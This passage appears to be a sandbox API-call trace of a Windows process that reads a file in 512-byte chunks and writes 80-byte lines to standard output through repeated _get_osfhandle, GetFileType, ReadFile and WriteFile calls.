[0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] GetFileType (hFile=0x50) returned 0x1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] GetFileType (hFile=0x50) returned 0x1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.886] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.886] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.886] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.886] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] GetFileType (hFile=0x50) returned 0x1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] GetFileType (hFile=0x50) returned 0x1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] GetFileType (hFile=0x50) returned 0x1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.886] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] GetFileType (hFile=0x50) returned 0x1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] GetFileType (hFile=0x50) returned 0x1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] GetFileType (hFile=0x50) returned 0x1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] GetFileType (hFile=0x50) returned 0x1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] GetFileType (hFile=0x50) returned 0x1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.887] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.887] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.887] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.887] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.887] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.887] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] GetFileType (hFile=0x50) returned 0x1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] GetFileType (hFile=0x50) returned 0x1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] GetFileType (hFile=0x50) returned 0x1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] GetFileType (hFile=0x50) returned 0x1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] GetFileType (hFile=0x50) returned 0x1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] GetFileType (hFile=0x50) returned 0x1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.888] GetFileType (hFile=0x50) returned 0x1 [0205.888] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] GetFileType (hFile=0x50) returned 0x1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.889] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.889] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.889] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.889] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] GetFileType (hFile=0x50) returned 0x1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] GetFileType (hFile=0x50) returned 0x1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] GetFileType (hFile=0x50) returned 0x1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] GetFileType (hFile=0x50) returned 0x1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.889] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.889] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] GetFileType (hFile=0x50) returned 0x1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] GetFileType (hFile=0x50) returned 0x1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] GetFileType (hFile=0x50) returned 0x1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] GetFileType (hFile=0x50) returned 0x1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.890] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.890] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.890] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.890] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] GetFileType (hFile=0x50) returned 0x1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] GetFileType (hFile=0x50) returned 0x1 [0205.890] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.890] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] GetFileType (hFile=0x50) returned 0x1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] GetFileType (hFile=0x50) returned 0x1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] GetFileType (hFile=0x50) returned 0x1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] GetFileType (hFile=0x50) returned 0x1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] GetFileType (hFile=0x50) returned 0x1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.891] GetFileType (hFile=0x50) returned 0x1 [0205.891] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.892] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.892] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.892] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.892] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] GetFileType (hFile=0x50) returned 0x1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] GetFileType (hFile=0x50) returned 0x1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] GetFileType (hFile=0x50) returned 0x1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] GetFileType (hFile=0x50) returned 0x1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] GetFileType (hFile=0x50) returned 0x1 [0205.892] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.892] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] GetFileType (hFile=0x50) returned 0x1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] GetFileType (hFile=0x50) returned 0x1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] GetFileType (hFile=0x50) returned 0x1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.893] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.893] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.893] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.893] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] GetFileType (hFile=0x50) returned 0x1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] GetFileType (hFile=0x50) returned 0x1 [0205.893] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.893] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] GetFileType (hFile=0x50) returned 0x1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] GetFileType (hFile=0x50) returned 0x1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] GetFileType (hFile=0x50) returned 0x1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] GetFileType (hFile=0x50) returned 0x1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] GetFileType (hFile=0x50) returned 0x1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.894] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.894] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] GetFileType (hFile=0x50) returned 0x1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.895] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.895] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.895] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.895] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] GetFileType (hFile=0x50) returned 0x1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] GetFileType (hFile=0x50) returned 0x1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] GetFileType (hFile=0x50) returned 0x1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] GetFileType (hFile=0x50) returned 0x1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] GetFileType (hFile=0x50) returned 0x1 [0205.895] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.895] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] GetFileType (hFile=0x50) returned 0x1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] GetFileType (hFile=0x50) returned 0x1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] GetFileType (hFile=0x50) returned 0x1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.896] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.896] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.896] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.896] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] GetFileType (hFile=0x50) returned 0x1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 